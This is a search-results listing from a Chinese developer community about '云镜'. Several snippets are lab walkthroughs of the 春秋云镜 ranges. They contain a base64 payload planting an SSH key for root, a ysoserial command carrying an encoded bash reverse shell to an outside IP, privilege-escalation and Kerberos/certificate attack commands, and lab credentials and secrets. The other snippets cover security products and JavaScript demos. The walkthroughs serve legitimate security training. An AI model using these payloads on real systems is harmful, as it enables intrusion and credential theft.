- 综合排序
- 最热优先
- 最新优先
- 来自专栏很菜的web狗
春秋云镜-Spoofing
工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说云镜难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。 authorized_keys 在进行base64加密 ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA +PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg== 所以我们上传Spoofing.txt "bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA +PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64
2.5K20编辑于 2023-05-09 - 来自专栏Windows技术交流
排查云镜异常
排查云镜异常,可以收集云镜日志让售后看下C:\Program Files\QCloud\YunJing\log复制该目录,对复制后的目录进行压缩,压缩成.7z格式(压缩率高,压缩文件小,方便传输)云镜的 如果解析到同一个地址,telnet测试反而省事了,如果解析到多个地址,每个地址对应的端口都telnet测试下看看通不通s.yd.qcloud.coml.yd.qcloud.comu.yd.qcloud.com云镜域名的情况比较复杂 ,具体可参考官网文档:https://cloud.tencent.com/document/product/296/12236图片官网文档上虽然对云镜的域名分门别类这么多,但我建议以nslookup或dig
2K40编辑于 2022-06-21 - 来自专栏产品体验优化私房菜课程
主机安全(云镜)产品简介
台以下,可以参考网上的一些文章来加固我们的服务器,如笔者之前整理的《Linux服务器安全加固10条建议》和《Windows服务器安全加固10条建议》等, 如果服务器不断的增加业务快速的膨胀这时就需要借助“云” 的安全力量,那就是“主机安全(云镜)”这款产品。 image.png 开通云主机时可以免费开通“主机安全”防护 image.png 什么是主机安全(云镜) 主机安全基于腾讯安全积累的海量威胁的数据,利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务 image.png 云镜的主要功能介绍 概览页面:https://console.cloud.tencent.com/cwp ; 资产列表(需要付费3元/台1天): 直观的看到每台服务器上的端口、账号 image.png 本文参考 云镜产品介绍视频: https://cloud.tencent.com/edu/learning/course-1055-995 主机安全文档:https://cloud.tencent.com
10.1K42编辑于 2022-04-14 - 来自专栏红蓝对抗
内网渗透-春秋云镜篇(Privilege)
@172.22.14.16/xrlab/xradmin.git proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2 @172.22.14.16/xrlab/xrwiki.git proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2 ]] passwords = [line.split('|')[2].strip() for line in lines[2:]] with open('user.txt', 'w') as user_file b9 33 a2 f7 9e e5 77 78 db f9 cd b1 73 e9 b2 df 35 67 5e b0 12 85 ac 59 db 4c 53 8e 2d 6a d4 d3 93 f5 61 30 ee f5 53 d0 2a ae cf 50 83 92 31 ad 67 17 7a 21 58 dc 62 96 2f f2 1c 1e bc 05 1b 43 48 91 5d c1
1.3K10编辑于 2024-04-12 - 来自专栏红蓝对抗
内网渗透之突破云镜-Delivery
ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ WIN-HAUWOLAO [->]172.22.13.28[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 sshecho "xxx">>/tmp/temp/.ssh/authorized_keys此时即可用kali进行登录提权FTP提权find / -user root -perm -4000 -print 2> time__1311=mqmx0DBDuDcD2QD9DBuQ1GkQrPxMR8DArD中的NFS提权。首先在靶机上写入一个c文件。 :Authentication Id : 0 ; 84434 (00000000:000149d2)Session : Service from 0User Name
58410编辑于 2024-02-27 - 来自专栏红蓝对抗
内网渗透-春秋云镜篇之Flarum
\___|_| \__,_|\___|_|\_\ fscan version: 1.8.3 start infoscan trying RunIcmp2 time__1311=mqmx0DBD2Gqiw40vofDy7D9m6GOCDcGiG7oD&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Fu%2F50470#toc 我们需要先配置下映射关系 vim /etc/hosts 而后申请ST proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab/evilpc2$ xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$ 0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+J NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
91010编辑于 2024-02-29 - 来自专栏红蓝对抗
内网渗透 -春秋云镜篇之Hospital
JdumpSpirder,https://github.com/whwlsfb/JDumpSpider/releases 再次寻找成功发现ShiroKey 得到密钥GAYysgMQhG7/CziJlVpR2g 接下来尝试写入内存马 执行命令 有一些不方便,用冰蝎的反弹shell功能弹到vps上 提权 find / -user root -perm -4000 -print 2>/dev/null 发现vim, \___|_| \__,_|\___|_|\_\ fscan version: 1.8.3 start infoscan trying RunIcmp2 Target 172.30.54.179 is alive (icmp) Target 172.30.54.12 is alive [*] Icmp alive hosts len is: 2 多层代理搭建 我们的第一层代理是VPS作为服务端,外网靶机作为客户端来搭建的,那么我们在搭建第二层的话,以外网靶机作为服务端,然后以域用户二作为客户端,此时就实现了多层代理 VPS->外网靶机->域用户2-
86410编辑于 2024-03-18 - 来自专栏红蓝对抗
内网渗透 -春秋云镜篇之Hospital
JdumpSpirder,https://github.com/whwlsfb/JDumpSpider/releases 再次寻找成功发现ShiroKey 得到密钥GAYysgMQhG7/CziJlVpR2g 接下来尝试写入内存马 执行命令 有一些不方便,用冰蝎的反弹shell功能弹到vps上 提权 find / -user root -perm -4000 -print 2>/dev/null 发现vim, \___|_| \__,_|\___|_|\_\ fscan version: 1.8.3 start infoscan trying RunIcmp2 Target 172.30.54.179 is alive (icmp) Target 172.30.54.12 is alive [*] Icmp alive hosts len is: 2 多层代理搭建 我们的第一层代理是VPS作为服务端,外网靶机作为客户端来搭建的,那么我们在搭建第二层的话,以外网靶机作为服务端,然后以域用户二作为客户端,此时就实现了多层代理 VPS->外网靶机->域用户2-
2.2K20编辑于 2024-03-10 - 来自专栏腾讯云开发者社区头条
【腾讯云】云镜-主机安全防护解决方案
image.png 云镜为腾讯云海量用户抵御黑客攻击 image.png 充分利用云的优势对密码破解行为进行拦截和预警 image.png 基于AI的WebShell检测技术 云镜WebShell检测优势 Q:云镜是否会采集我主机上的隐私数据? Q:云镜的客户端稳定性如何,是否会造成业务影响? Q:云镜的漏洞检测覆盖哪些范围,是否可以替代传统扫描器? A:云镜漏洞检测功能主要侧重于高危可造成入侵的漏洞,包括WEB和系统组件,云镜对于新出现的漏洞有较快的响应速度,能在极短的时间内完成全部业务主机检测,可以避免扫描器策略更新滞后和扫描效率低带来的风险,对于历史上的漏洞
26.5K138发布于 2018-08-01 - 来自专栏AIGC
【AI视频】Runway:Gen-2 运镜详解
qq2890091630.blog.csdn.net 我们在之前的文章中,我们深入探讨了Gen-2和Gen-3的生成视频技术和运动模式,本文将继续介绍Runway的运镜。 Runway Gen-2 作为AI视频生成领域的领先工具,其运镜功能为创作者提供了前所未有的自由度。在生成视频时,用户可以通过调整相机的运动路径、视角和焦距,实现复杂的动态镜头效果。 Runway官方文档 Camera Control(运镜) 在 Runway Gen-2 中,运镜功能提供了精确操控视频生成过程中的视角与动态。 组合使用 运镜里的效果都是可以组合使用的,通过组合使用可以灵活运用各种摄像头控制功能,以达到理想的视觉效果。 导出查看效果 9月20日Runway生成运镜效果 小结 本文详细探讨了 Runway Gen-2 的 Camera Control 功能,展示了这一先进工具如何通过精细的运镜技术,赋予视频创作者前所未有的创作自由度和表达能力
1.6K10编辑于 2024-10-17 - 来自专栏红蓝对抗
内网渗透—春秋云镜篇之2022网鼎杯
172.22.15.13 (Windows Server 2016 Standard 14393) [+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Standard 14393 [*] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 /home/quan9i/zdoosys_user.txt xiaorang.lab/ hashcat爆破得到两组用户 lixiuying:winniethepooh huachunmei:1qaz2wsx 当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd 申请证书模板 要尝试两次才能成功 proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA
97410编辑于 2024-02-27 - 来自专栏红蓝对抗
内网渗透—春秋云镜篇之2022网鼎杯
172.22.15.13 (Windows Server 2016 Standard 14393) [+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Standard 14393 [*] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 /home/quan9i/zdoosys_user.txt xiaorang.lab/ hashcat爆破得到两组用户 lixiuying:winniethepooh huachunmei:1qaz2wsx 当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd 申请证书模板 要尝试两次才能成功 proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA
57010编辑于 2024-02-29 - 来自专栏河湾欢儿的专栏
放大镜
放大镜:淘宝等电商页面应用广泛... 思路:先让move块和bimg块隐藏,当鼠标移动到box上时,使move块和bimg块显示,获取鼠标当前的位置,然后经过计算给与move块和bimg块适当的值实现放大镜效果 <! DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>放大镜</title> <style 的距离左面的距离 var mT = mag.offsetTop; // 大DIV的距离上面的距离 //为了让鼠标居中,拿到小滑块自身的宽度除以2 var mW = oMove.offsetWidth / 2; //为了让鼠标居中,拿到小滑块自身的高度除以2
2.1K30发布于 2018-09-06 - 来自专栏腾讯安全
腾讯主机安全(云镜)兵器库:WebShell克星-TAV引擎
(CNVD-2021-10320,CNVD-2021-08442,CNVD-2021-51345) 2.动态行为分析 与静态分析不同,动态行为分析关注攻击行为的发生,TAV引擎在内部实现了一个安全精巧的 TAV WebShell引擎的检测效果 在云上真实WebShell黑样本集中,腾讯TAV引擎的检测贡献率能达到99%以上。 相比于传统的特征检测方案,TAV WebShell检测引擎不仅有着超高的检测率,同时也有超低的误报率,在云上真实环境中,也具备较高的独报能力。 目前腾讯主机安全(云镜)已全面接入TAV WebShell检测能力,使腾讯云主机查杀防御WebShell攻击的能力得以大幅提升。 后续还将陆续接入腾讯安全其他产品,比如腾讯高级威胁检测系统(御界)、Web应用防火墙、云防火墙、零信任iOA等等产品,将全面增强在终端侧、主机侧、流量侧的安全能力。
4.3K20编辑于 2021-12-08 - 来自专栏webTower
放大镜原理
// 注意这里,这里是让鼠标坐标减去滑块大小的一半 // 这样做可以让鼠标的位置在滑块的中心处 var leftX = e.clientX - slide.offsetWidth / 2, topY = e.clientY - slide.offsetHeight / 2; // 下面的判断是为了让鼠标移动时滑块更够在指定的区域显示 if (leftX
2.8K10发布于 2019-10-23 - 来自专栏Creator星球游戏开发社区
放大镜效果
它核心是对相机应用,异名基于此实现一个放大镜的demo ? 另外一种是正交投影模式,也叫"平行投影",就是把图像通过平行光线投影到画面上,可以理解成一张平面上的画,它就是用来拍摄2D画面的。 ? 相机有—个clearFlag如果你设置了,它在绘制画面的时候,会清理屏幕 一般只给前面的相机设置clearFlag;后面相机都不能再设置,不然会把前面相机绘制的内容清除掉 把思路拉回到放大镜demo中, 要实现放大镜,其实就是多创造一个相机去拍摄需要放大的物体,然后调整相机的缩放比例,使投影的物体放大或者缩小对应的倍数,然后配合使用Mask组件去裁剪我们需要的局部位置,mask的编辑器设置请参考项目源码
2.3K30发布于 2020-04-22 - 来自专栏贾志刚-OpenCV学堂
云从科技跨镜追踪(ReID)技术再次刷新世界记录
这是继去年云从科技刷新跨镜追踪技术世界纪录后,再一次在该领域领跑全球。 相较去年,云从科技在扩大算法领先优势的同时,也在跨镜追踪(ReID)技术的商业化中积累了丰富的实践经验,不仅核心算法速度提高了10倍,还围绕跨镜追踪(ReID)技术打造了行人检测、追踪、结构化等一系列算法模块 云从科技原创的“飞龙R2”算法方案在Market-1501,DukeMTMC-reID,CUHK03三大数据集中,mAP关键指标分别达到了91.14%、83.31%、81.06%,相较于目前业内顶尖水平有着近 云从科技“飞龙R2”算法方案在三大数据集的mAP指标中,相较于去年又分别提高了整整4.24%,4.91%,13.66%。 云从科技作为这一领域较早的探索者和布局者,在跨镜追踪和其相关技术上,如行人检测、行人检索、行人轨迹跟踪、行人属性结构化、行人动作检测和识别等,都拥有大量技术经验积累。
1.3K20发布于 2019-04-29 - 来自专栏天天
$.extend()插件(放大镜)
small0">
2. 计算小红快的位置 $(opt.mask).offset({//让小红快跟着鼠标走 left:e.clientX - $(opt.mask).width()/2, top:e.clientY - $(opt.mask).height()/2 //让鼠标位于小红快的中心 })1.7K10发布于 2018-09-29 - 来自专栏安全播报
腾讯主机安全(云镜)兵器库:斩杀挖矿木马的利剑-BinaryAI引擎
这一期,我们向朋友们详细介绍腾讯安全技术团队如何利用人工智能方法,开发出BinaryAI引擎对样本文件进行软件成分分析,使未知挖矿木马检测能力大幅提升,目前腾讯主机安全(云镜)已率先集成BinaryAI image.png 据腾讯安全最新统计,在公有云的攻击事件当中,以挖矿为目的的入侵行为占比超过一半,达到54.9%,腾讯安全团队在过去30天捕获挖矿木马攻击事件累计超过6000件。 ---- 传统挖矿木马检测方案包含三个维度 1.静态检测:基于字符串常量、特征检测规则和文件hash的检测方法; 2.动态检测:基于矿池网络连接行为的检测方法; 3.主机层检测:云主机资源异常占用的检测方法 腾讯主机安全(云镜)已率先接入BinaryAI引擎,可以通过BinaryAI引擎检测未知挖矿木马威胁。 科恩实验室团队三次摘得国际顶级黑客大赛Pwn2Own总冠军,并打破历史成为首个获得DEF CON CTF赛事冠军的中国团队,在国内CTF比赛中多次获得重量级赛事冠军。
1.2K40编辑于 2022-05-11 - 来自专栏start
js放大镜效果
/ 得到遮罩相对于小图的偏移量(鼠标所在坐标-小图相对于body的偏移-遮罩本身宽度或高度的一半) var s_left = e.pageX - mark.offsetWidth / 2 - small.offsetLeft var s_top = e.pageY - mark.offsetHeight / 2 - small.offsetTop // 遮罩仅可以在小图内移动
2.7K10编辑于 2024-03-20
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号